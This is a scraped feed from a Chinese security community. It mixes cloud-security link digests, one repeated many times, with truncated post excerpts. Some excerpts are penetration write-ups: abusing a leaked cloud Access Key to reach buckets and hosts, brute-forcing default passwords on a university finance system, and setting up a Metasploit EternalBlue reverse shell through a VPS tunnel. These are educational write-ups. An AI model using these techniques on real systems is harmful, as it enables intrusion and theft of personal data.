https://www.lacework.com/blog/attackers-want-your-identity-and-know-exactly-where-to-find-it/
在公共 GitHub 存储库上暴露的 Shiba Inu AWS 凭证泄露
https://www.scmagazine.com/news/cloud-security/leaked-shiba-inu-aws-credential-exposed-on-public-github-repository
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月14日 01:01火线zone
0x00 前言
之前有次在做攻防演练的时候,通过反编译小程序找到了目标云服务的 Access Key,最终通过这个 AK 拿下了目标上千万条敏感信息以及几十台云服务主机的 root 权限,整个过程平平无奇,这里简单记录下。
阅前须知:
文中数据的值都是虚构的内容,非真实场景里的数据。
文中使用的 CF 工具版本为 v0.4.0,如果读者有在使用 CF,为避免版本不同导致命令不一致的情况,请以 CF 使用手册里的命令为准,CF 使用手册地址:wiki.teamssix.com/cf
0x01 发现访问凭证并利用
首先找到目标的微信小程序,反编译小程序找到了硬编码在源码里的 Access Key

将 Access Key 配置到 CF 云环境利用框架里,CF 项目地址:github.com/teamssix/cf
cf config

尝试列出一下当前访问凭证的资源,因为输出内容较多,这里仅展示了一部分,再次提醒一下,本文图片中数据的值都是虚构内容,非真实场景里的数据。
cf alibaba ls

最终通过 CF 列出这个 AK 里有 2 个存储桶以及 30 多台云服务主机,不过里面有一台是关机的。
0x02 存储桶的利用
先来看这两个存储桶,在第一个存储桶 teamssix-api-example 里有 500 多 M 的数据,在存储桶体积比较少的情况下,可以直接使用 cf alibaba oss obj get命令下载存储桶里的所有对象,但这里存储桶体积比较大,还是用 OSS Browser 大概预览下吧。
用 OSS Browser 打开第一个存储桶,翻了一遍,没有发现太多敏感的信息,然后继续打开第二个存储桶,发现在第二个存储桶里存储了大量的身份证信息。

在 OSS Browser 里没办法看到这些文件的总数,好在 CF 的输出结果里可以看到存储桶的文件总数。
从 CF 的输出结果来看这个存储桶总共有 345 w 条数据,从 OSS Browser 列出的结果来看,估计这三百多万条的数据应该都是身份证照片之类的信息了。
0x03 ECS 的利用
刚才通过 CF 发现了 30 多台云服务主机,这里先看看 CF 能对云主机执行哪些操作。
cf alibaba ecs exec -h

在写报告的时候需要有服务器权限证明的截图,这里可以直接使用 CF 一键执行三要素,方便写报告。
cf alibaba ecs 
2022年9月13日 16:01火线zone
如何使用洞态 IAST 高效的审计漏洞与 SQL 注入 Bypass 和 CVE 申请
https://zone.huoxian.cn/d/2552-iastsqlbypasscve
eBPF Uprobe 的实现以及如何逃逸 Uprobe 监控
https://blog.quarkslab.com/defeating-ebpf-uprobe-monitoring.html
NSA 为 Kubernetes 提出的三个主要安全建议
https://containerjournal.com/features/nsa-wants-strong-kubernetes-authentication-and-authorization/
云安全态势管理 CSPM 的演进
https://sonraisecurity.com/blog/the-evolution-of-cloud-security-posture-management/
云安全软件开发人员的崛起
https://securityboulevard.com/2022/09/the-rise-of-software-developers-in-cloud-security/
零信任对 Kubernetes 意味着什么?
https://www.infoq.cn/article/R4ZfdijOEfQqg9muFlGS
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月13日 12:31火线zone
信息收集
首先对该大学进行信息收集。发现财务管理系统存在密码操作说明

此处说明修改后的默认密码为123,并在管理系统页面中发现存在薪酬制单使用说明书,下载的文件存在一个工号泄露的问题

通过这里的工号泄露,我们可以得知,此处工号为000000-999999区间,且职工工号一般前两位不变
手动尝试000000账号密码,发现登陆成功,为项目暂管员

同时通过扫描目录,发现存在dist目录下的其他网站

同样使用000000的账号,成功登陆

财务管理信息系统中,有一个网上审批系统,点进去后,如下图:

通过之前得知的员工工号,我们进行账号爆破,通过爆破得知000634账号为修改密码的默认密码123

同时点击个人中心,并抓包


点击修改密码出,同样修改传参,可更改他人密码,此处已涉及违法犯罪行为,不进行尝试。
此处修改密码的传参与个人中心的传参一致,故判定此处修改密码与个人信息同样存在,但由于修改密码涉及违法行为,故不进行操作。
2022年9月13日 10:31火线zone
目的
Kubernetes是Google 2014年创建管理的,是Google 10多年大规模容器管理技术Borg的开源版本。它是容器集群管理系统,是一个开源的平台,可以实现容器集群的自动化部署、自动扩缩容、维护等功能。本文详细介绍了集群的搭建。
规划
一台master结点,两台node结点

组件功能:

安装
设置主机名
192.168.6.201上执行
# 设置master节点主机名 hostnamectl set-hostname --static k8s-master
192.168.6.202 上执行
# 设置node1节点主机名 hostnamectl set-hostname --static k8s-node1
所有节点上添加hosts
192.168.6.201 k8s-master 192.168.6.202 k8s-node1 192.168.6.203 k8s-node2
安装docker-ce
所有节点上(k8s-master, k8s-node1, k8s-node2)安装docker-ce:
# 安装必要软件包 yum install -y yum-utils device-mapper-persistent-data lvm2 # 设置docker镜像源 yum-config-manager --add-repo \ http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo # 安装docker-ce yum update -y && yum install -y \ containerd.io-1.2.13 \ docker-ce-19.03.8 \ docker-ce-cli-19.03.8 # 启动docker,并设置开机自启 systemctl enable docker && systemctl start docker # 配置docker镜像加速 cat <<EOF > /etc/docker/daemon.json { "exec-opts": ["native.cgroupdriver=systemd"], "registry-mirrors": [ "https://gcr.azk8s.cn", "https://docker.mirrors.ustc.edu.cn", "http://hu
2022年9月9日 15:04火线zone
AWS KMS 完整指南
https://blog.lightspin.io/the-complete-guide-to-aws-kms
走向成熟的KubeEdge边缘网络项目EdgeMesh详解
https://mp.weixin.qq.com/s/VzvxugdizNIg9GVE-ybUew
如何加强你的 Azure 云安全性
https://sonraisecurity.com/blog/azure-cloud-security/
VMware 在 VMware vSphere 8 中采用 Kubernetes API
https://containerjournal.com/features/vmware-embraces-kubernetes-apis-in-vmware-vsphere-8/
CF 云环境利用框架更新至 v0.4.0 版本
https://mp.weixin.qq.com/s/lSpNCnKRYY6w02JTbMvzEA
5 个巩固 Kubernetes 安全性的实用技巧
https://www.lacework.com/blog/5-practical-tips-to-lock-up-your-kubernetes-security/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月9日 11:34火线zone
一、洞态IAST环境部署
洞态IAST官网
https://dongtai.io/
GitHub地址
https://github.com/HXSecurity/DongTai
docker-compose一键部署
文档地址:https://github.com/HXSecurity/DongTai/blob/main/deploy/docker-compose/README-zh.md
git clone https://github.com/HXSecurity/DongTai.git cd DongTai/deploy/docker-compose/
安装docker
curl -fsSL https://get.docker.com -o get-docker.sh sudo sh get-docker.sh
安装Docker-compose
sudo curl -L "https://github.com/docker/compose/releases/download/v2.6.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose docker-compose --version

部署洞态Server端
./dtctl install

等待下载即可

部署Agent

安装成功之后登录
ps: SCAtoken

如果需要可以添加官方员工小依的微信申请
OA环境搭建
GitHub地址:https://github.com/cloudwebsoft/ywoa

搭建好之后是这样,因为是Tomcat一键启动的,不过IAST也支持进程注入的方式挂载Agent
加载Agent
首先下载agent.jar

随后传入Windows里面,使用下面的命令
# 找到tomcat进程 tasklist | findstr tomcat # 加载Agent java -jar agent.jar -m install -p [PID]
WindowsCMD注入Agent推荐使用管理员模式

等待几秒钟加载成功提示即可

加载成功

随后在项目中就可以看到项目名称了

洞态IAST会对组件等信息进行扫描,现在可以访问OA站点,即可。
二、
2022年9月8日 14:33火线zone
百万级服务器护航经验沉淀,腾讯安全《云上安全攻防实战手册》发布
https://mp.weixin.qq.com/s/G4vp5GNoqPTQeMIGzaYdtw
为了保护云原生 API,避免过度宽松的状态
https://containerjournal.com/features/to-protect-cloud-native-apis-avoid-overly-permissive-states/
96% 的人本可以防止他们的身份泄露 - IDSA
https://ermetic.com/blog/cloud/96-of-organizations-could-have-prevented-their-identity-breach-idsa-report-2022/
基于云的文件系统作为勒索软件防御
https://securityboulevard.com/2022/09/cloud-based-file-systems-as-a-ransomware-defense/
CIEM vs CWPP vs CSPM
https://www.trendmicro.com/en_us/devops/22/i/ciem-vs-cwpp-vs-cspm.html
记一次地级市某行业专项攻防演练
https://forum.butian.net/share/1854
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月8日 12:33火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月7日 17:03火线zone
AWS 安全组指南
https://sysdig.com/blog/aws-security-groups-guide/
多云安全:要考虑的关键事项
https://www.rebellionresearch.com/multi-cloud-security-key-things-to-consider
2 分钟测试 Kubernetes Pod 安全
https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
云中之战:防止 DDoS 攻击
https://securityboulevard.com/2022/09/battle-in-the-cloud-preventing-ddos-attacks/
AWSGoat:对 AWS 云解决方案进行渗透测试
https://www.infoq.cn/article/MV5Lp3yF1d3ewP1MPD9w
如何限制对你的公开访问的 RDS 实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-your-publicly-accessible-rds-instance
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月6日 16:02火线zone
浅谈云原生BAS
https://mp.weixin.qq.com/s/vp14doFQzEHn1DJA05oSLQ
深入了解 Distroless
https://iximiuz.com/en/posts/containers-distroless-images/
什么是云加密?
https://www.crowdstrike.com/cybersecurity-101/cloud-security/cloud-encryption/
Azure 云安全工具简介
https://sonraisecurity.com/blog/an-introduction-to-azure-cloud-security-features/
我,PolarDB云原生数据库,5年来实现这些重磅技术创新
https://mp.weixin.qq.com/s/Q-G3-x33tPgxW2ANdaYeBA
火线Zone助力 |这场零信任攻防赛,有点不一样!邀攻击选手报名参赛
https://mp.weixin.qq.com/s/t1yNNR4potK3MUF9xf3nnA
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月5日 18:01火线zone
安全管理向云端转移
https://securityboulevard.com/2022/09/security-management-shifting-to-the-cloud-techstrong-tv/
BPF 进阶笔记(五):几种 TCP 相关的 BPF(sockops、struct_ops、header options)
https://arthurchiao.art/blog/bpf-advanced-notes-5-zh/
公有云攻防系列——云服务利用篇
https://mp.weixin.qq.com/s/zw9nGP9-czU2aPrpVa6wkg
Azure Synapse:Spark 中的本地权限提升漏洞
https://orca.security/resources/blog/synapse-local-privilege-escalation-vulnerability-spark/
Azure 身份治理和安全
https://sonraisecurity.com/blog/azure-identity-governance-security/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月2日 15:07火线zone
什么是最小权限原则?为什么它如此重要?
https://blog.lightspin.io/devsecops/principle-of-least-privilege
真实世界的云攻击:缓解云计算勒索的真正方法
https://www.darkreading.com/cloud/real-world-cloud-attacks-true-tasks-of-cloud-ransomware-mitigation
亚马逊云科技:安全工作好比消防,与其去救火,不如防患于未然
https://www.infoq.cn/article/mJxWq8XfDBHGfdefkawS
Confidential Computing 能为 Kubernetes 社区做什么?
https://www.cncf.io/blog/2022/08/31/what-can-confidential-computing-do-for-the-kubernetes-community/
Docker 的 health 健康状态检查
https://mp.weixin.qq.com/s/kXjQ2WWZbiQ_xZZb2VcRSQ
VMware 旨在通过新技术重新定义多云网络和安全性
https://www.cloudcomputing-news.net/news/2022/sep/01/vmware-aims-to-redefine-multi-cloud-networking-and-security-with-new-tech/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月1日 15:01火线zone
微软 Azure 故障导致 Ubuntu 虚拟机脱机
https://www.bleepingcomputer.com/news/microsoft/microsoft-azure-outage-knocks-ubuntu-vms-offline-after-buggy-update/
AWS 的事件响应
https://www.chrisfarris.com/post/aws-ir/
自动化的 Azure 滥用研究--第二部分
https://posts.specterops.io/automating-azure-abuse-research-part-2-3e5bbe7a20c0
为什么云数据库需要在你的技术栈中?
https://thenewstack.io/why-cloud-databases-need-to-be-in-your-tech-stack/
采用服务网格的 6 大好处?
https://mp.weixin.qq.com/s/C0pLSurasF4Xp7el2O3_og
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年8月31日 18:31火线zone
【少走弯路】关于安卓抓包的个人经验
前几天发了一个关于安卓抓包的一个文章,当时就是将之前记得随手一发,这次来讲一下关于安卓抓包的一些个人经验(可能会和那篇文章有重复的地方),通常我们在对app进行测试的时候会通过模拟器进行抓包,其实最弄个二手实体机但是毕竟家里没矿,然后这里我总结了很多在搭建渗透环境的时候的一些经验和较为简单的解决办法
微信公众号:小惜渗透,欢迎大佬一起交流进步
1. 模拟器
模拟器的选择通常就是下面几款(我用的是雷电和MuMu):
雷电模拟器
夜神模拟器
MuMu模拟器
逍遥模拟器
这里面雷电模拟器可以设置网络为桥接,但是其它貌似都不可以,但是雷电安Xposed得时候总失败(后面会写解决办法);然后夜神模拟器的话我真是服了,不知道是不是我电脑原因遇到个很蛋疼的bug,就是虚拟键盘老调不出来,就很烦,不过它有个优点就是软件商店里面的Xposed可以一键安装上;MuMu模拟器感觉上略微简洁轻便,用起来感觉相比于其它快很多;然后逍遥模拟器我没怎么用过,自行检验吧。
既然是模拟器那么它就是存在快照功能的,在我们测试的时候会经常调网络或者设置代理,所以我建议经常创建快照,以为我之前有几次调完代理模拟器就坏了,然后卡到94%,试了各种解决办法都无果,只能删了重新创建。
2. 代理问题
因为一些应用会检测是否使用代理,所以我不建议测试的时候直接在系统中设置代理,我的做法是利用Proxifier将模拟器流量导向Burp,下面是我之前写的配置教程,可以参考
我用的是雷电模拟器,Burp配置如下:
<img src="https://mc-imgup.oss-cn-beijing.aliyuncs.com/img/20220815112320.png" alt="image-20220512140826184" style="zoom:80%;" />


Proxifier配置如下:
设置代理服务器
<img src="https://mc-imgup.oss-cn-beijing.aliyuncs.com/img/20220512141020.png" alt="image-20220512141020904" style="zoom:80%;" />


<img src="https://mc-imgup.oss-cn-beijing.aliyuncs.com/img/20220512141122.png"
2022年8月31日 18:31火线zone
看我用内网MSF打公网永恒之蓝
存在疑问,网查没有,技术一般,重在思路,不喜勿喷
正常用msf打永恒之蓝漏洞的过程复现在网上一翻一大堆,不过基本上都是内网的两个虚拟机互打,然后之前我就冒出来个稀奇古怪的想法,假如这台带有永恒之蓝漏洞的服务器在公网上呢,我又不想在公网上装msf,怎么才能用内网msf碰到外网的漏洞呢?下面是我利用内网msf打公网的永恒之蓝的过程。
1. frp搭建
首先需要frp搭建隧道,将本地的4444端口,映射到公网VPS的30001端口上,VPS和本地分别下载frp按照如下配置
本地设置frpc.ini
server_port是公网为了和内网建立frp隧道的端口
remote_port在这里代表要将本地4444端口映射到公网的30001端口上
local_ip注意要写内网IP不要写本地回环地址(127.0.0.1)
VPS设置frps.ini
frps.ini文件配置相对简单些,token对应上就行
微信公众号:小惜渗透,欢迎大佬一起交流进步
然后本地和VPS分别启动frp
#本地 ./frpc -c ./frpc.ini
#VPS ./frps -c ./frps.ini
开启后我们访问公网的30001端口就会直接穿到本地的4444上,例如我在本地用python开个http服务
访问公网的30001
至此frp配置完成
2. 攻击公网永恒之蓝
首先用在线靶场开个靶机
之后打开msf并加载msf17-010攻击载荷
注意这个载荷默认的payload是windows/x64/meterpreter/reverse_tcp这个后续要用到,然后设置配置项
options set rhosts 52.81.73.86 set lhosts VPS地址 set lport 30001
这个时候先不要run,这里执行攻击是可以不过我们设置的回连地址是VPS地址,端口是frp的那个端口,也就是代表它会穿到内网的4444端口来,但是当我们run时除了执行攻击载荷外,它还有一步就是根据设置的回连的地址和端口监听,也就是在本地监听公网所以自然监听不到,但是如果我们设置监听本地地址确实能监听到,但是回弹shell却弹不回来,这里就很难搞
这时候我们需要在启动一个msf,并且根据上面的默认payload设置本地监听
use exploit/multi/handler set payload windows/x64/m
2022年8月31日 16:01火线zone
应对当前修补容器漏洞的挑战
https://toddysm.com/2022/08/23/addressing-the-curent-challenges-of-patching-container-vulnerabilities/
【云攻防系列】从攻击者视角聊聊K8S集群安全(下)
https://mp.weixin.qq.com/s/pyg6ipGgGW0GMvtBQ-GbgQ
在生产中采用的 26 个 AWS 安全最佳实践
https://sysdig.com/blog/26-aws-security-best-practices/
为什么在任何地方注意 AWS IAM 角色很重要
https://ermetic.com/blog/aws/why-its-important-to-take-notice-of-aws-iam-roles-anywhere/
AWS Lambda 中不安全的反序列化行为
https://www.contrastsecurity.com/security-influencers/insecure-deserialization-in-aws-lambda
金融科技公司如何保护消费者的信任,从云开始
